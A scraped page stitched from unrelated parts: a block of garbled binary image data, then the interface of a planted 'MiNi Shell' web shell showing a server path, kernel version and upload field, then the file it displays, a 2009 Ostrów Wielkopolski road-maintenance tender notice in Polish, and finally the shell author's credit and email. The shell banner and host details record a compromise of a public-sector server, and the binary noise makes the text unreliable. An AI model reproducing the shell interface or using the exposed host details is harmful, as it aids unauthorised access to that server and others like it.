JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/168785-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Utrzymanie znaków i urządzeń bezpieczeństwa ruchu drogowego  oraz wykonanie malowania poziomego   
     na drogach  znajdujących się w zarządzie Miejskiego Zarządu Dróg w ramach bieżącego utrzymania 
     ulic na terenie miasta Ostrowa Wielkopolskiego w sezonie 2009/2010.</b><br>
<b>Numer ogłoszenia: 168785 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Rejtana 54, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 7352576, faks 062 7352664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.osw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie znaków i urządzeń bezpieczeństwa ruchu drogowego  oraz wykonanie malowania poziomego   
     na drogach  znajdujących się w zarządzie Miejskiego Zarządu Dróg w ramach bieżącego utrzymania 
     ulic na terenie miasta Ostrowa Wielkopolskiego w sezonie 2009/2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:

1. Utrzymanie znaków drogowych i urządzeń zabezpieczających w ramach bieżącego utrzymania 
     ulic  lokalnych na terenie miasta Ostrowa Wielkopolskiego w sezonie 2009/2010
-	konserwacja oznakowania pionowego i urządzeń bezpieczeństwa ruchu drogowego
-	montaż / demontaż / wymiana elementów oznakowania pionowego
-	montaż / demontaż / wymiana urządzeń bezpieczeństwa ruchu
-	montaż oznakowania awaryjnego

2. Wykonanie malowania oznakowania poziomego w ramach bieżącego utrzymania ulic  
        lokalnych na terenie miasta Ostrowa Wielkopolskiego w sezonie 2009/2010r
-	malowanie / odnawianie oznakowania poziomego na ulicach powiatowych i lokalnych miasta Ostrowa Wielkopolskiego.

3.Utrzymanie sygnalizacji świetlnych na drogach  na terenie miasta Ostrowa Wielkopolskiego 
   znajdujących się w zarządzie MZD w sezonie 2009/2010r
-	utrzymanie sygnalizacji świetlnych na terenie miasta Ostrowa Wielkopolskiego, polegające na remontach bieżących i drobnych naprawach
-	usuwanie awarii sygnalizacji świetlnych (przystąpienie do usunięcia awarii mastąpić musi w ciągu 30 min. od momentu przyjęcia zgłoszenia)
-	dokonywanie  codziennych przeglądów działania sygnalizacji  - prowadzenie dzienników eksploatacji sygnalizacji  świetlnych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.90.00.00-6, 34.99.22.00-9, 34.99.61.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.500,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24, ust 1 i 2,  
     spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień 
     publicznych (Dz. U. z  2007 nr 223 poz. 1655; z 2008 r. Nr 171, poz. 1058).

1.	Posiadają uprawnienia do wykonywania przedmiotowej działalności.

2.	Posiadają niezbędną wiedzę i doświadczenie do realizacji robót wskazanych w opisie przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
           Wykonawca przystępujący do przetargu musi wykazać się zrealizowanymi (jako główny 
           wykonawca) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, (a jeżeli  okres 
           prowadzenia działalności jest krótszy -  w tym okresie) minimum 2 wykonanymi  zadaniami           
           odpowiadającymi przedmiotowi zamówienia, potwierdzającymi wykonanie:
1.	utrzymanie znaków drogowych i urządzeń zabezpieczających
2.	wykonanie malowania oznakowania poziomego -  min 4300 m2 malowania każda
             3.   utrzymanie sygnalizacji świetlnych na drogach

3.	Posiadają niezbędny  potencjał sprzętowy do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego.

4.	Posiadają w dyspozycji  wykwalifikowany personel odpowiedzialny za prawidłowe wykonanie robót  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
           
5.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
      Mają dostęp lub dysponują środkami finansowymi wystarczającymi do realizacji robót. 

6.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

7. Zamawiający zastrzega, że część zamówienia dotycząca utrzymania 
    sygnalizacji świetlnych na drogach na terenie miasta Ostrowa Wielkopolskiego znajdujących                                
    się w zarządzie MZD w sezonie 2009/2010 r. nie może być powierzona podwykonawcom. 

8.Posiadają strzeżony magazyn depozytowy o powierzchni minimalnej 300 m2 na terenie miasta Ostrowa 
   Wielkopolskiego, który zostanie udostępniony bezpłatnie dla potrzeb zamawiającego.

9.   Posiadają świadectwo przeszkolenia do obsługi sygnalizacji świetlnych wydane przez producenta 
      eksploatowanych na terenie objętym zamówieniem sterowników

Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie dokumentów określonych w pkt. 7 SIWZ, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, SIWZ oraz ustawy - Prawo Zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7. l. Formularz oferty / na załączonym druku 
7.2. Dowód wpłacenia / wniesienia wadium /.
7.3. Dane dotyczące sytuacji ekonomicznej i finansowej.     
1)	Aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  Profil działania Wykonawcy musi odpowiadać przedmiotowi zamówienia.                  Odpis musi zawierać aktualny wykaz osób uprawnionych do reprezentowania wykonawcy.    
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentów składa dokument lub dokumenty wystawione i obowiązujące w danym 
      kraju, potwierdzające odpowiednio że nie otwarto jego likwidacji ani nie ogłoszono upadłości, że nie 
      zalega z uiszczeniem podatków  opłat, składek na ubezpieczenie społeczne i zdrowotne albo że 
      uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
     wstrzymanie w całości  wykonania decyzji właściwego organu, że nie orzeczono wobec niego zakazu 
     ubiegania się o  zamówienie.                                            
2)	Oświadczenie w trybie Art. 22 ust. 1 ustawy, (druk w załączeniu)
3)	Oświadczenie w trybie Art. 24 ust. 1  i  2 ustawy, (druk w załączeniu)
4)   Pełnomocnictwo w oryginale do podpisania oferty. (Pełnomocnictwo nie jest wymagane jeżeli 
      podpisujący jest lub są właścicielami przedsiębiorstwa lub jeżeli są oni wymienieni z imienia i 
      nazwiska w odnośnym dokumencie rejestracyjnym)  
.      5)  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca 
            nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem  
            zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości 
            wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
            przed upływem terminu składania ofert. 
       6)   Zaświadczenie z właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
             Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na 
             ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem  
             zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości 
             wykonania decyzji  właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
             przed upływem terminu składania ofert.     

      Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast dokumentów wymaganych w punktach 5 i 6 SIWZ wykonawca składa dokument lub 
     dokumenty wystawione i obowiązujące w danym  kraju, potwierdzające odpowiednio że nie otwarto 
      jego likwidacji ani nie ogłoszono upadłości, że nie zalega z uiszczeniem podatków  opłat, składek na 
     ubezpieczenie społeczne i zdrowotne albo że  uzyskał przewidziane prawem  zwolnienie, odroczenie 
     lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego 
     organu, że nie orzeczono wobec niego zakazu ubiegania się o  zamówienie.                                   

7)	Oświadczenie finansowe, że oferent posiada środki finansowe do realizacji robót. 
8)	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada podstawowy rachunek bankowy potwierdzającej wysokość posiadanych środków finansowych lub zdolność  kredytową wykonawcy. Wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
      9) Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
           wykonaniu zamówienia z  udokumentowaniem ich doświadczenia i kwalifikacji zawodowych                 
       (druk w załączeniu). 
       Osoby którymi będzie dysponował Wykonawca posiadać będą wszelkie niezbędne uprawnienia  
       wymagane obowiązującymi przepisami branżowymi. 
       Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania   
       zamówienia, jeżeli w wykazie o którym mowa powyżej wykonawca wskazał osoby, którymi będzie 
       dysponował.
10) Wykaz  niezbędnego do wykonania zamówienia sprzętu którym dysponuje lub będzie dysponował 
       wykonawca, (druk w załączeniu).
Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia sprzętu jeżeli w wykazie o którym mowa powyżej wykonawca wskazał sprzęt którym będzie dysponował.
      11) Wykaz zrealizowanych w ciągu ostatnich trzech lat min. 2 usług odpowiadających przedmiotowi 
            zamówienia. z podaniem ich wartości , daty i miejsca wykonania wraz z załączeniem dokumentów 
            potwierdzających, że zamówienia te zostały wykonane należycie, (wymagane przedstawienie referencji).
            Wykaz robót należy sporządzić zgodnie z pkt. 5.2 SIWZ.
7.4. Umowa spółki cywilnej jeżeli ofertę składa spółka cywilna, dokumenty rejestrowe wszystkich
 współwłaścicieli.
7.5. Wykaz - wskazanie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom. 

   Zamawiający zastrzega, że część zamówienia dotycząca utrzymania sygnalizacji świetlnych na drogach          
   na terenie miasta Ostrowa Wielkopolskiego znajdujących się w zarządzie MZD w sezonie 2009/2010 r.            
   nie może być powierzona podwykonawcom. 

7.6. Oświadczenie, że wszystkie materiały użyte do wykonania robót objętych ofertą będą posiadały  
       odpowiednie atesty i certyfikaty dopuszczające do stosowania oraz będą spełniać odpowiednie wymagania 
       norm.
7.7.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust.1, pkt.4 - 8 
        ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania   
        ofert.   
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentu składa zaświadczenie właściwego organu sądowego lub administracyjnego 
      kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym                 
     w art. 42, ust. 1, pkt. 4 - 8 ustawy.
7.8.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1, pkt. 9 
        ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - jeżeli 
        dotyczy.
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentów składa dokument lub dokumenty wystawione i obowiązujące w danym 
      kraju, potwierdzające odpowiednio że nie otwarto jego likwidacji ani nie ogłoszono upadłości, że nie 
      zalega z uiszczeniem podatków  opłat, składek na ubezpieczenie społeczne i zdrowotne albo że 
      uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
     wstrzymanie w całości  wykonania decyzji właściwego organu, że nie orzeczono wobec niego zakazu 
     ubiegania się o  zamówienie.                                   
7.9. Projekt umowy zaakceptowany (podpisany) przez Wykonawcę (druk w załączeniu) 
7.10. Oświadczenie o dokonaniu wizji lokalnej na terenach objętych umową oraz zapoznaniu się z 
        asortymentem przewidzianych w umowie prac.
7. 11. Oświadczenie o posiadaniu strzeżonego magazynu depozytowego o powierzchni min. 300m2, który zostanie 
        udostępniony bezpłatnie dla potrzeb zamawiającego na terenie miasta Ostrowa Wielkopolskiego.
7.12. Oświadczenie o ilości stron dokumentacji ofertowej.
7.23. Wykaz stron objętych tajemnicą handlową przedsiębiorstwa zgodnie z art. 8 ust. 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzd.osw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zamenhofa 2b, 63-400 Ostrów Wielkopolski - pok. nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 08:30, miejsce: Miejski Zarząd Dróg ul. Zamenhofa 2b, 63-400 Ostrów Wielkopolski - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com